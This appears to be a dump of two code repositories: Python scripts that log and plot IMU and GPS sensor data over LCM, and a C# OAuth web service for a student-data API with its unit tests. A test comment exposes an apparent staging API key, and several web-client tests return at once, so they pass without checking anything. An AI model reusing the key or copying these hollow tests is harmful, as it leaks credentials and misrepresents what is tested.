<file_sep>#!bin/bash IMU_Port=/dev/ttyUSB1 GPS_Port=/dev/ttyUSB0 export DISPLAY=:0 make make lcm-spy pushd ../lcm-spy/ ./runspy.sh & popd sudo gps_driver.py ${GPS_Port} & sudo imu_driver.py ${IMU_Port} & lcm-logger logs/imu_gps_log -i <file_sep>#!/usr/bin/env python # -*- coding: utf-8 -*- # for VectorNav IMU sensor import sys import lcm import time import serial import utm from exlcm import imu_message #import imu_message class IMU(object): def __init__(self, port_name): self.port = serial.Serial(port_name, 115200, timeout=1.) print 'Connected to:'+ self.port.portstr self.lcm = lcm.LCM("udpm://?ttl=1") self.packet = imu_message() print 'IMU: Initializing IMU' time.sleep(2) self.port.write('$VNTAR*5F\n') time.sleep(2) print 'Initialization complete, IMU tared' def readloop(self): while True: line = self.port.readline() while not line.startswith('$VNYMR'): line = self.port.readline() try: print(line) yawst, pitchst, rollst, magxst, magyst, magzst, accelxst, accelyst, accelzst, gyroxst, gyroyst, gyrozst = line.replace('$VNYMR','').strip().split('*')[0].split(',')[1:13] self.packet.yaw = float(yawst) self.packet.pitch = float(pitchst) self.packet.roll = float(rollst) self.packet.magx = float(magxst) self.packet.magy = float(magyst) self.packet.magz = float(magzst) self.packet.accelx = float(accelxst) self.packet.accely = float(accelyst) self.packet.accelz = float(accelzst) self.packet.gyrox = float(gyroxst) self.packet.gyroy = float(gyroyst) self.packet.gyroz = float(gyrozst) self.lcm.publish("IMU", self.packet.encode()) except: print("Data failed for some reason") # except: # print 'GPS ERROR (' + line + ')' if __name__ == "__main__": if len(sys.argv) != 2: print "Usage: %s <serial_port>\n" % sys.argv[0] sys.exit(0) myimu = IMU(sys.argv[1]) myimu.readloop() <file_sep>all: bash buildjar.sh ${TYPES_PATH} <file_sep>import sys import lcm import csv import matplotlib.pyplot as plt import numpy as np from scipy import integrate from exlcm import gps_message from exlcm import imu_message if len(sys.argv) < 2: sys.stderr.write("usage: read-log <logfile>\n") sys.exit(1) log = lcm.EventLog(sys.argv[1], "r") imucount = 0 gpscount = 0 time = [] accx = [] accy = [] magy = [] magx = [] gyroz = [] for event in log: if event.channel == "GPS_Channel": # try: msg = gps_message.decode(event.data) imucount = imucount + 1 elif event.channel == "IMU": msg = imu_message.decode(event.data) #print(" timestamp = %s" % str(msg.timestamp)) #print(" yaw = %s" % str(msg.yaw)) #print(" pitch = %s" % str(msg.pitch)) #print(" roll = %s" % str(msg.roll)) #print(" magx = %s" % str(msg.magx)) #print(" magy = %s" % str(msg.magy)) #print(" magz = %s" % str(msg.magz)) #print(" accelx = %s" % str(msg.accelx)) #print(" accely = %s" % str(msg.accely)) #print(" accelz = %s" % str(msg.accelz)) #print(" gyrox = %s" % str(msg.gyrox)) #print(" gyroy = %s" % str(msg.gyroy)) #print(" gyroz = %s" % str(msg.gyroz)) time.append(msg.timestamp) accx.append(msg.accelx) accy.append(msg.accely) magy.append(msg.magy) magx.append(msg.magx) gyroz.append(msg.gyroz) gpscount = gpscount + 1 velocity = integrate.cumtrapz(accx, time,initial=0) #displacement = integrate.cumtrapz(velocity, time, initial = 0) nmagy = [] for num in magy: nmagy.append(num * -1) # get yaw data correctedyaw = np.arctan2(nmagy, magx) integratedyaw = integrate.cumtrapz(gyroz, time, initial = 0) # use low pass filter yaw = 0.98 * integratedyaw + 0.02*correctedyaw wx = correctedyaw * velocity comparison = yaw - wx #print(wx) #print(integratedyaw) plt.plot(magx, magy, 'ro') plt.show() <file_sep>#!/usr/bin/env python # -*- coding: utf-8 -*- # for USB GPS import sys import lcm import time import serial import utm from exlcm import gps_data class Gps(object): def __init__(self, port_name): self.port = serial.Serial(port_name, 4800, timeout=2.) # 9600-N-8-1 self.lcm = lcm.LCM() self.packet = gps_data() while True: print 'GPS: Initialization' line = self.port.readline() try: vals = line.split(",") except: vals = 0 if len(vals) == 0: time.sleep(0.2) self.port.flush() else: break def readloop(self): while True: line = self.port.readline() #try: vals = line.split(',') if vals[0] == "$GPGGA": self.packet.timestamp = int(vals[1]) self.packet.latitude = float(vals[2]) self.packet.lat_bearing = vals[3] self.packet.longitude = float(vals[4]) self.packet.long_bearing = vals[5] self.packet.altitude = float(vals[9]) if self.packet.lat_bearing == "S" : self.packet.latitude = -1 * self.packet.latitude if self.packet.long_bearing == "W" : self.packet.longitude = -1 * self.packet.longitude utm_coordinates = utm.from_latlon(self.packet.latitude/100, self.packet.longitude/100) self.packet.utm_X = float(utm_coordinates[0]) self.packet.utm_y = float(utm_coordinates[1]) print("timestamp: ", self.packet.timestamp) print("latitude: ", self.packet.latitude) #print("lat_bearing: ", self.packet.lat_bearing) print("longitude: ", self.packet.longitude) #print("long_bearing: ", self.packet.long_bearing) print("altitude: ", self.packet.altitude) print("gps_data: ", self.packet) #print("gps_data_encode: ", self.packet.encode()) print("utm_X", self.packet.utm_X) print("utm_y", self.packet.utm_y) self.lcm.publish("GPS", self.packet.encode()) else: line = 1 #except: #print 'ERROR (' + line + ')' if __name__ == "__main__": if len(sys.argv) != 2: print "Usage: %s <serial_port>\n" % sys.argv[0] sys.exit(0) mygps = Gps(sys.argv[1]) mygps.readloop() <file_sep>import sys import lcm import matplotlib.pyplot as plt from exlcm import gps_data if len(sys.argv) < 2: sys.stderr.write("usage: read-log <logfile>\n") sys.exit(1) log = lcm.EventLog(sys.argv[1], "r") utm_x_list = [] utm_y_list = [] for event in log: if event.channel == "GPS": msg = gps_data.decode(event.data) utm_x_list.append(msg.utm_X) utm_y_list.append(msg.utm_y) plt.plot(utm_x_list,utm_y_list,'ro') plt.axis([min(utm_x_list),max(utm_x_list),min(utm_y_list),max(utm_y_list)]) plt.show() <file_sep>import sys import lcm import math import csv import matplotlib.pyplot as plt import numpy as np from scipy import integrate from scipy import optimize from exlcm import gps_message from exlcm import imu_message if len(sys.argv) < 2: sys.stderr.write("usage: read-log <logfile>\n") sys.exit(1) log = lcm.EventLog(sys.argv[1], "r") imucount = 0 gpscount = 0 time = [] accx = [] accy = [] magy = [] magx = [] yaw = [] easting = [] northing = [] gyroz = [] for event in log: if event.channel == "GPS_Channel": # try: msg = gps_message.decode(event.data) imucount = imucount + 1 easting.append(msg.easting) northing.append(msg.northing) elif event.channel == "IMU": msg = imu_message.decode(event.data) #print(" timestamp = %s" % str(msg.timestamp)) #print(" yaw = %s" % str(msg.yaw)) #print(" pitch = %s" % str(msg.pitch)) #print(" roll = %s" % str(msg.roll)) #print(" magx = %s" % str(msg.magx)) #print(" magy = %s" % str(msg.magy)) #print(" magz = %s" % str(msg.magz)) #print(" accelx = %s" % str(msg.accelx)) #print(" accely = %s" % str(msg.accely)) #print(" accelz = %s" % str(msg.accelz)) #print(" gyrox = %s" % str(msg.gyrox)) #print(" gyroy = %s" % str(msg.gyroy)) #print(" gyroz = %s" % str(msg.gyroz)) time.append(event.timestamp) accx.append(msg.accelx) accy.append(msg.accely) magy.append(msg.magy) magx.append(msg.magx) gyroz.append(msg.gyroz) yaw.append(msg.yaw) gpscount = gpscount + 1 oyaw = yaw basetime = min(time) realtime = [] for times in time: realtime.append(times -basetime) time = realtime velocity = integrate.cumtrapz(accx, time,initial=0) #displacement = integrate.cumtrapz(velocity, time, initial = 0) nmagy = [] for num in magy: nmagy.append(num * -1.0) # get yaw data correctedyaw = np.arctan2(nmagy, magx) heading = correctedyaw integratedyaw = integrate.cumtrapz(gyroz, time, initial = 0) print("max nmagy: " + str(max(nmagy))) print("min nmagy: " + str(min(nmagy))) print("max magy: " + str(max(magy))) print("mix magy: " + str(min(magy))) print("max heading: " + str(max(heading))) print("mix heading: " + str(min(heading))) # use low pass filter yaw = 0.98 * integratedyaw + 0.02*correctedyaw wx = correctedyaw * velocity # gyro z times x velocity xvel = integrate.cumtrapz(accx, time, initial = 0) gzxv = (gyroz * xvel)/10000000 #print(integratedyaw) modx = [] mody = [] for m in magx: #modx.append(m-.005) el = m-.005 ma = math.cos(-0.7) #+ math.sin(-0.7) fi = el * ma #print(fi) #fi = math.sqrt(fi) modx.append(fi) for m in magy: #mody.append(m-.255) el = m-.255 ma = 1#(-1 * math.sin(-0.7) + math.cos(-0.7)) fi = el * ma #fi - math.sqrt(fi) mody.append(fi) fig = plt.figure() gr = fig.add_subplot(111) #Pre-Calibration mag #gr.plot(magx, magy, 'ro') #gr.set_title('Pre-Calibration') #gr.set_xlabel('MagX') #gr.set_ylabel('MagY') #Post-Calibration mag #gr.plot(modx, mody, 'ro') #plt.xlim(min(modx),max(modx)) #plt.ylim(min(mody),max(mody)) #gr.set_title('Post-Calibration') #gr.set_xlabel('MagX') #gr.set_ylabel('MagY') #GPS Route #gr.plot(easting, northing, 'ro') #gr.set_title('GPS Route') #gr.set_xlabel('Easting') #gr.set_ylabel('Northing') #Yaw from IMU #gr.plot(time, yaw, color = "r") #gr.set_title('IMU Yaw') #gr.set_xlabel('Time') #gr.set_ylabel('Yaw') #Yaw from IMU VS Calculated #gr.plot(time, yaw, color = "r") #gr.plot(time, integratedyaw, color = "b") #gr.set_title('IMU Yaw vs Calculated Yaw') #gr.set_xlabel('Time') #gr.set_ylabel('Yaw') # Problem 1: compare y acceleration vs gyroz times x velocity gr.plot(time, gzxv, color = "r") gr.plot(time, accy, color = "b") gr.set_title('Y Acc Vs. GyroZ*X Velocity') gr.set_xlabel('Time') gr.set_ylabel('Acceleration') # Problem 2: ev = [] nv = [] xvel = integrate.cumtrapz(accx, time, initial = 0) noyaw = [] for v in oyaw: noyaw.append(-1*v) for v,head in zip(xvel,noyaw): ev.append(v*math.cos(math.radians(head))) nv.append(v*math.sin(math.radians(head))) xcoord = [] ycoord = [] x = 0 y = 0 edis = integrate.cumtrapz(ev, time, initial = 0) ndis = integrate.cumtrapz(nv, time, initial = 0) edis2 = [] ndis2 = [] for e,n in zip(edis,ndis): e = (e*math.cos(-.5104))-(n*math.sin(-.5104)) n = (n*math.cos(-.5104))+(e*math.sin(-.5104)) e = e/(.0786/.0415) edis2.append(e) ndis2.append(n) #gr.plot(edis2, ndis2, color = "r") #gr.set_title('IMU Path') #gr.set_xlabel('Easting') #gr.set_ylabel('Northing') plt.show() <file_sep>import sys import lcm from exlcm import gps_message from exlcm import imu_message if len(sys.argv) < 2: sys.stderr.write("usage: read-log <logfile>\n") sys.exit(1) log = lcm.EventLog(sys.argv[1], "r") imucount = 0 gpscount = 0 for event in log: # print(event.channel) if event.channel == "GPS_Channel": print(event.channel) try: msg = gps_message.decode(event.data) print("Message:") print(" timestamp = %s" % str(msg.timestamp)) print(" gpstime = %s" % str(msg.gpstime)) print(" latitude = %s" % str(msg.latitude)) print(" longitude = %s" % str(msg.longitude)) print(" altitude = %s" % str(msg.altitude)) print(" easting = %s" % str(msg.easting)) print(" northing = %s" % str(msg.northing)) imucount = imucount + 1 print("") except: print("Did not work") elif event.channel == "IMU": print(event.channel) msg = imu_message.decode(event.data) print("Message:") print(" timestamp = %s" % str(msg.timestamp)) print(" yaw = %s" % str(msg.yaw)) print(" pitch = %s" % str(msg.pitch)) print(" roll = %s" % str(msg.roll)) print(" magx = %s" % str(msg.magx)) print(" magy = %s" % str(msg.magy)) print(" magz = %s" % str(msg.magz)) print(" accelx = %s" % str(msg.accelx)) print(" accely = %s" % str(msg.accely)) print(" accelz = %s" % str(msg.accelz)) print(" gyrox = %s" % str(msg.gyrox)) print(" gyroy = %s" % str(msg.gyroy)) print(" gyroz = %s" % str(msg.gyroz)) gpscount = gpscount + 1 print("Total imu points: " + str(imucount)) print("Total gps points: " + str(gpscount))
65475535cb1fad67d2e9df43edca6dd252c31512
[ "Python", "Makefile", "Shell" ]
8
Shell
omcnicoll/Robotics-Sensing-Navigation
a4404d26c869ba5abde9cce0e275a3cbb2435e28
1d4c24a217fecf14fc946cc93263c56ac7a0f50a
refs/heads/master
<file_sep>using System.Web.Mvc; namespace PCG.GOAL.WebService.Controllers { [Authorize(Roles = "Admin")] public class AdminController : Controller { // GET: Admin public ActionResult Index() { var baseUrl = string.Format("{0}://{1}", Request.Url.Scheme, Request.Url.Authority); var token = DbConfig.GetInternalToken(baseUrl); ViewBag.Token = token; return View(); } } }<file_sep>using System; using Microsoft.AspNet.Identity; using Microsoft.Owin; using Microsoft.Owin.Security.Cookies; using Microsoft.Owin.Security.OAuth; using Owin; using PCG.GOAL.WebService; using PCG.GOAL.WebService.Security; [assembly: OwinStartup(typeof(Startup))] namespace PCG.GOAL.WebService { public class Startup { public static OAuthAuthorizationServerOptions OAuthOptions { get; private set; } public static string PublicClientId { get; private set; } public void Configuration(IAppBuilder app) { OAuthOptions = new OAuthAuthorizationServerOptions { TokenEndpointPath = new PathString("/Token"), Provider = new GoalOAuthProvider(), RefreshTokenProvider = new GoalRefreshTokenProvider(), AccessTokenExpireTimeSpan = TimeSpan.FromDays(1), AllowInsecureHttp = true }; // Enable the application to use bearer tokens to authenticate users app.UseOAuthBearerTokens(OAuthOptions); app.UseCookieAuthentication(new CookieAuthenticationOptions { AuthenticationType = DefaultAuthenticationTypes.ApplicationCookie, LoginPath = new PathString("/Authentication/Login"), CookieHttpOnly = false, }); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.Common.Interface { public interface IOAuthValidator { bool ValidateClient(string clientId, string clientSecret); Credentials ValidateUser(string username, string password); bool VerifyHashedPassword(string hashedPassword, string password); } } <file_sep>using System; using System.Collections.Generic; using Microsoft.VisualStudio.TestTools.UnitTesting; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.WebService.Test.WebClient { /* * This TestClass will run the tests against the web servce published to http://goalservice.azurewebsites.net, * which therefor retrieves data from service in https://stage-rethinkapi.azurewebsites.net/api/children * with apikey=f6c869277d6b4eaeb9408e90d91ce0a6. * if those services are not available, or just don't want to run this Test Class, * please comment out all the test methods below */ [TestClass] public class WebClientTest { const string BaseUrl = "http://goalservice.azurewebsites.net"; const string TokenEndpoint = "/token"; const string EndpointAllStudents = "/api/rethink/Student"; const string EndpointStudentByIdentity = "/api/rethink/StudentByIdentity?firstname=Brooklin&lastname=Altis&dob=20080605"; const string EndpointStudentByStatetestnumber = "/api/rethink/StudentByStatetestnumber?statetestnumber=2724167171"; private Token _token; private WebClientSampleCode _webClientSampleCode; [TestInitialize] public void TestInitilaize() { _webClientSampleCode=new WebClientSampleCode(BaseUrl,TokenEndpoint, EndpointAllStudents,EndpointStudentByIdentity,EndpointStudentByStatetestnumber); _token = _webClientSampleCode.GetToken(); } [TestMethod] public void CanGetStudentByIdentity() { return; try { var responseData = _webClientSampleCode.GetStudentByIdentity(_token); Assert.IsNotNull(responseData); Assert.IsTrue(responseData.Done); Assert.IsInstanceOfType(responseData.Data, typeof(IEnumerable<ChildInfo>)); } catch (Exception ex) { Assert.IsNull(ex); } } [TestMethod] public void CanGetStudentByStatetestnumber() { return; try { var responseData = _webClientSampleCode.GetStudentByStatetestnumber(_token); Assert.IsNotNull(responseData); Assert.IsTrue(responseData.Done); Assert.IsInstanceOfType(responseData.Data, typeof(IEnumerable<ChildInfo>)); Assert.IsTrue(responseData.Data.Count == 1); } catch (Exception ex) { Assert.IsNull(ex); } } [TestMethod] public void CanGetAllStudents() { return; try { var responseData = _webClientSampleCode.GetAllStudents(_token); Assert.IsNotNull(responseData); Assert.IsTrue(responseData.Done); Assert.IsInstanceOfType(responseData.Data, typeof(IEnumerable<ChildInfo>)); } catch (Exception ex) { Assert.IsNull(ex); } } [TestMethod] public void CanGetToken() { try { var token = _webClientSampleCode.GetToken(); Assert.IsNotNull(token); Assert.IsInstanceOfType(token, typeof(Token)); } catch (Exception ex) { Assert.IsNull(ex); } } [TestMethod] public void CanRefreshToken() { try { var token = _webClientSampleCode.RefreshToken(); Assert.IsNotNull(token); Assert.IsInstanceOfType(token, typeof(Token)); } catch (Exception ex) { Assert.IsNull(ex); } } } } <file_sep>using System; using System.Collections.Generic; using System.Security.Claims; using System.Threading.Tasks; using Microsoft.Owin.Security; using Microsoft.Owin.Security.OAuth; using Ninject; using PCG.GOAL.Common.Interface; namespace PCG.GOAL.WebService.Security { public class GoalOAuthProvider : OAuthAuthorizationServerProvider { [Inject] public IOAuthValidator Validator { get; set; } public GoalOAuthProvider() { Validator = WebApiApplication.Kernel.Get<IOAuthValidator>(); } public override async Task ValidateClientAuthentication(OAuthValidateClientAuthenticationContext context) { try { string clientId, clientSecret; if (context.TryGetBasicCredentials(out clientId, out clientSecret) || context.TryGetFormCredentials(out clientId, out clientSecret)) { if (Validator.ValidateClient(clientId, clientSecret)) { context.Validated(); } } else { context.SetError("Invalid credentials"); context.Rejected(); } } catch (Exception e) { context.SetError("Server error"); context.Rejected(); } } public override async Task GrantResourceOwnerCredentials(OAuthGrantResourceOwnerCredentialsContext context) { var credentials = Validator.ValidateUser(context.UserName, context.Password); if (credentials == null) { context.Rejected(); return; } // create identity var id = new ClaimsIdentity(context.Options.AuthenticationType); id.AddClaim(new Claim("sub", context.UserName)); id.AddClaim(new Claim(ClaimTypes.Name, context.UserName)); id.AddClaim(new Claim(ClaimTypes.Role,credentials.Role)); // create metadata to pass on to refresh token provider var props = new AuthenticationProperties(new Dictionary<string, string> { {"oauth:client_id", context.ClientId} }); var ticket = new AuthenticationTicket(id, props); context.Validated(ticket); } public override async Task GrantRefreshToken(OAuthGrantRefreshTokenContext context) { var originalClient = context.Ticket.Properties.Dictionary["oauth:client_id"]; var currentClient = context.ClientId; // enforce client binding of refresh token if (originalClient != currentClient) { context.Rejected(); return; } // chance to change authentication ticket for refresh token requests var newId = new ClaimsIdentity(context.Ticket.Identity); newId.AddClaim(new Claim("newClaim", "refreshToken")); var newTicket = new AuthenticationTicket(newId, context.Ticket.Properties); context.Validated(newTicket); } } } <file_sep>using System; using System.Collections.Generic; using System.Net.Http; using System.Threading.Tasks; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.ExternalDataService.Interface { public interface IWebServiceClient<T> where T : class { Credentials Credentials { get; set; } string BaseUri { get; set; } string TokenEndpoint { get; set; } string ServiceEndpoint { get; set; } Func<Credentials> SetCredentials { get; set; } bool IsSingleResult { get; set; } IClient HttpClient { get; set; } IContent ResponseContent { get; set; } string GetToken(); Task<ResponseData<T>> GetAsync(string token = null); Task<ResponseData<T>> PostAsync(IEnumerable<T> records, string token = null); Task<ResponseData<T>> PutAsync(IEnumerable<T> records, string token = null); Task<ResponseData<T>> DeleteAsync(IEnumerable<T> records, string token = null); } }<file_sep>using System.Collections.Generic; namespace PCG.GOAL.Common.Models { public class BehaviorInfo { public string Name { get; set; } public string Description; public string DataCollectionMethod { get; set; } public string IepGoal { get; set; } public List<BehaviorObjective> BehaviorObjectives { get; set; } } }<file_sep>/* * usage: * dialogService.confirmModal('Confirm','Are you sure?',function_Ok); * * */ (function () { angular.module("webServices").factory('dialogService', ['$modal', rainConfirm]); function rainConfirm($modal) { return { confirmModal: confirmModal, messageModal: messageModal }; // confirmModal function confirmModal(title, message, funcOk) { title = title || 'Confirm'; message = message || 'Are you sure?'; var modalInstance = $modal.open({ //templateUrl: 'deleteUserModal.html', //size:'sm', template: getConfirmTemplate(title, message), controller: function ($scope, $modalInstance) { $scope.ok = function () { if (funcOk && angular.isFunction(funcOk)) { funcOk(); //return; } $modalInstance.close(true); }; $scope.cancel = function () { $modalInstance.close(false); }; } }); return modalInstance.result; } function getConfirmTemplate(title, message) { return '<div class="modal-header">' + '<h3 class="modal-title">' + title + '</h3>' + '</div>' + '<div class="modal-body">' + '<p style="font-size: 16px;">' + message + '</p>' + '</div>' + '<div class="modal-footer">' + '<button class="btn btn-primary" ng-click="ok()">Yes</button>' + '<button class="btn btn-warning" ng-click="cancel()">No</button>' + '</div>'; } // messageModal function messageModal(title, markup, funcOk) { title = title || 'Information'; markup = markup || '<p></p>'; var modalInstance = $modal.open({ //size:'sm', template: getMessageTemplate(title, markup), controller: function ($scope, $modalInstance) { $scope.ok = function () { if (funcOk && angular.isFunction(funcOk)) { funcOk(); //return; } $modalInstance.close(true); }; } }); return modalInstance.result; } function getMessageTemplate(title, markup) { return '<div class="modal-header">' + '<h3 class="modal-title">' + title + '</h3>' + '</div>' + '<div class="modal-body">' + markup + '</div>' + '<div class="modal-footer">' + '<button class="btn btn-primary" ng-click="ok()">Close</button>' + '</div>'; } } })();<file_sep>using System.Data; using System.Linq; using Microsoft.VisualStudio.TestTools.UnitTesting; using Moq; using PCG.GOAL.Common.DataAccess; using PCG.GOAL.Common.Interface; namespace PCG.GOAL.WebService.Test.DataAccess { [TestClass()] public class DbServiceTests { private Mock<ISqlDataAccess> _sqlDataAccessMock; private IDbService _dbService; [TestInitialize] public void TestInitialize() { _sqlDataAccessMock = new Mock<ISqlDataAccess>(); _dbService = new DbService(_sqlDataAccessMock.Object); } [TestMethod()] public void GetAllCredentialsTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetCredentialsTable()); var all = _dbService.GetAllCredentials(); Assert.IsNotNull(all); Assert.AreEqual(2, all.ToList().Count); } [TestMethod()] public void GetCredentialsTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetCredentialsTable()); var result = _dbService.GetCredentials("userAdmin"); Assert.IsNotNull(result); Assert.AreEqual("<PASSWORD>", result.Password); } [TestMethod()] public void GetCredentialsByIdTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetCredentialsTable()); var result = _dbService.GetCredentialsById(1); Assert.IsNotNull(result); Assert.AreEqual("<PASSWORD>", result.Password); } [TestMethod()] public void GetAllClientInfoTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetClientTable); var all = _dbService.GetAllClientInfo(); Assert.IsNotNull(all); Assert.AreEqual(2, all.ToList().Count); } [TestMethod()] public void GetClientInfoTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetClientTable); var result = _dbService.GetClientInfo("client_1"); Assert.IsNotNull(result); Assert.AreEqual("secret_1", result.ClientSecret); } [TestMethod()] public void GetClientInfoByIdTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetClientTable); var result = _dbService.GetClientInfoById(1); Assert.IsNotNull(result); Assert.AreEqual("secret_1", result.ClientSecret); } private static DataTable GetCredentialsTable() { var table = new DataTable(); table.Columns.Add("id", typeof(int)); table.Columns.Add("username", typeof(string)); table.Columns.Add("password", typeof(string)); table.Columns.Add("role", typeof(string)); table.Rows.Add(1, "userAdmin", "passAdmin", "roleAdmin"); table.Rows.Add(2, "userFoo", "passFoo", "roleFoo"); return table; } private static DataTable GetClientTable() { var table = new DataTable(); table.Columns.Add("id", typeof(int)); table.Columns.Add("clientid", typeof(string)); table.Columns.Add("clientsecret", typeof(string)); table.Columns.Add("description", typeof(string)); table.Rows.Add(1, "client_1", "secret_1", "description1"); table.Rows.Add(2, "client_2", "secret_2", "description2"); return table; } } } <file_sep>$(function () { $("#btnLogin").on('click', login); function login(e) { if ($('#txtUsername').val() === '' || $('#txtPassword').val() === '') { toastr.warning("Please enter username and password"); e.preventDefault(); return; } $('#formLogin').attr('action', "Login").attr('method', 'post').submit(); //$.post('/Authentication/Login/', $('#formLogin').serialize()); } var loginFailed = $('#loginFailed').val(); if (loginFailed && loginFailed.length > 0) { toastr.warning("Invalid username or password"); } });<file_sep>namespace PCG.GOAL.Common.WebModels { public interface IServiceConfig { string BaseUrl { get; set; } string ServiceEndpoint { get; set; } string TokenEndpoint { get; set; } string ApiKey { get; set; } } public class ServiceConfig : IServiceConfig { public string BaseUrl { get; set; } public string ServiceEndpoint { get; set; } public string TokenEndpoint { get; set; } public string ApiKey { get; set; } } } <file_sep>namespace PCG.GOAL.Common.Models { public class BehaviorMasteryCriteria { public string LocationTime { get; set; } public string Change { get; set; } public string Target { get; set; } public string TargetUnit { get; set; } } }<file_sep>using System.Collections.Generic; namespace PCG.GOAL.Common.Models { public class LessonInfo { public string LessonName { get; set; } public string LessonCategory { get; set; } public string IsCore { get; set; } public string LessonSubCategory { get; set; } public int IepGoalId { get; set; } public string IepGoal { get; set; } public bool InCurrentPlan { get; set; } public string CommonStandard { get; set; } public string CommonStandardDescription { get; set; } public string CommonStandardRationale { get; set; } public List<LessonObjective> LessonObjectives { get; set; } } }<file_sep>using System; using System.Collections.Specialized; using System.Net; using System.Text; using Newtonsoft.Json; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.WebService.Test.WebClient { public class WebClientSampleCode { #region fields and properties private const string TokenType = "Bearer"; private readonly string _baseUrl; private readonly string _endpointToken; private readonly string _endpointAllStudents; private readonly string _endpointStudentByIdentity; private readonly string _endpointStudentByStatetestnumber; private readonly Credentials _credentials; private Uri TokenUrl {get { return GetUri(_baseUrl, _endpointToken); }} #endregion #region Constructor public WebClientSampleCode(string baseUrl, string endpointToken, string endpointAllStudents, string endpointStudentByIdentity, string endpointStudentByStatetestnumber) { _baseUrl = baseUrl; _endpointToken = endpointToken; _endpointAllStudents = endpointAllStudents; _endpointStudentByIdentity = endpointStudentByIdentity; _endpointStudentByStatetestnumber = endpointStudentByStatetestnumber; var oauthAccess = new OAuthAccess(); _credentials = oauthAccess.GetCredentials(); } #endregion #region public methods public ResponseData<ChildInfo> GetAllStudents(Token token) { return GetStudentsByEndpoint(GetUri(_baseUrl, _endpointAllStudents),token); } public ResponseData<ChildInfo> GetStudentByIdentity(Token token) { return GetStudentsByEndpoint(GetUri(_baseUrl, _endpointStudentByIdentity), token); } public ResponseData<ChildInfo> GetStudentByStatetestnumber(Token token) { return GetStudentsByEndpoint(GetUri(_baseUrl, _endpointStudentByStatetestnumber), token); } public Token GetToken() { // web client var client = new System.Net.WebClient(); // invoke the REST method client.Headers.Add("Content-Type", "application/x-www-form-urlencoded"); string credentials = Convert.ToBase64String( Encoding.ASCII.GetBytes(string.Format("{0}:{1}", _credentials.ClientId, _credentials.ClientSecret))); client.Headers[HttpRequestHeader.Authorization] = string.Format("Basic {0}", credentials); var postVaules = new NameValueCollection { {"username",_credentials.Username}, {"password", _<PASSWORD>}, {"grant_type", GrantTpype.Password} }; try { byte[] result = client.UploadValues(TokenUrl, "POST", postVaules); var jsonData = Encoding.UTF8.GetString(result); var token = JsonConvert.DeserializeObject<Token>(jsonData); return token; } catch (WebException ex) { if (((HttpWebResponse)ex.Response).StatusCode == HttpStatusCode.BadRequest) { throw new WebException("Failed to request access token. Check you OAuth credentials."); } } return null; } public Token RefreshToken(Token token = null) { if (token == null) { token = GetToken(); } if (token == null || string.IsNullOrWhiteSpace(token.RefreshToken)) { return null; } // web client var client = new System.Net.WebClient(); // add headers client.Headers.Add("Content-Type", "application/x-www-form-urlencoded"); string credentials = Convert.ToBase64String( Encoding.ASCII.GetBytes(string.Format("{0}:{1}", _credentials.ClientId, _credentials.ClientSecret))); client.Headers[HttpRequestHeader.Authorization] = string.Format("Basic {0}", credentials); // refresh token request doesn't need "username" and "password" var postVaules = new NameValueCollection { {"grant_type", GrantTpype.RefreshToken}, {"refresh_token", token.RefreshToken} }; try { byte[] result = client.UploadValues(TokenUrl, "POST", postVaules); var jsonData = Encoding.UTF8.GetString(result); var refreshToken = JsonConvert.DeserializeObject<Token>(jsonData); return refreshToken; } catch (WebException ex) { if (((HttpWebResponse)ex.Response).StatusCode == HttpStatusCode.BadRequest) { throw new WebException("Failed to request access token"); } } return null; } #endregion #region private methods private ResponseData<ChildInfo> GetStudentsByEndpoint(Uri serviceUri, Token token) { // web client var client = new System.Net.WebClient(); client.Headers["Content-type"] = "application/json"; client.Headers[HttpRequestHeader.Authorization] = string.Format("{0} {1}", TokenType, token.AccessToken); try { return DownloadStudents(serviceUri, client); } catch (WebException wex) { if (((HttpWebResponse)wex.Response).StatusCode == HttpStatusCode.Unauthorized) { // validate token failed, need to refresh token token = RefreshToken(token); client.Headers[HttpRequestHeader.Authorization] = string.Format("{0} {1}", TokenType, token.AccessToken); return DownloadStudents(serviceUri, client); ; } } return null; } private static ResponseData<ChildInfo> DownloadStudents(Uri serviceUri, System.Net.WebClient client) { // invoke the REST method var jsonData = client.DownloadString(serviceUri); var responseData = JsonConvert.DeserializeObject<ResponseData<ChildInfo>>(jsonData); return responseData; } private Uri GetUri(string baseAddress, string endpoint = "") { try { var baseUri = new Uri(baseAddress); return new Uri(baseUri, endpoint); } catch (UriFormatException ex) { throw new Exception(string.Format("Please check the format of BaseUri or Endpoint"), ex); } } #endregion } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Mvc; using PCG.GOAL.WebService.Security; namespace PCG.GOAL.WebService.Controllers { [MvcAuthorize] public class HomeController : Controller { public ActionResult Index() { ViewBag.Title = "Home Page"; return View(); } public ActionResult Test() { return View("Index"); } } } <file_sep>using System.Threading.Tasks; using Microsoft.VisualStudio.TestTools.UnitTesting; using Moq; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; using PCG.GOAL.WebService.Controllers; namespace PCG.GOAL.WebService.Test.Controllers { [TestClass()] public class RethinkControllerTest { private Mock<IGoalService> _rethinkServiceMock; private RethinkController _rethinkController; [TestInitialize] public void TestInitialize() { _rethinkServiceMock = new Mock<IGoalService>(); _rethinkServiceMock.SetupGet(x => x.ServiceConfig).Returns(new ServiceConfig()); _rethinkController = new RethinkController(_rethinkServiceMock.Object); } [TestMethod()] public void GetTest() { _rethinkServiceMock.Setup(x => x.GetAllStudentsAsync()).Returns(GetResponse); var response = _rethinkController.Get(); 